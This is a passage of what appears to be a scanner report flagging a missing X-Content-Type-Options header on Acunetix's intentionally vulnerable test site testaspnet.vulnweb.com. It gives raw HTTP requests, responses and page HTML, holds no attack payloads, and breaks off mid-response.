Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 220 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=p2ttr345zecuqfmoxygyermi; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/about.aspx
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 322 bytes.	GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14619
Response Body - size: 14,619 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 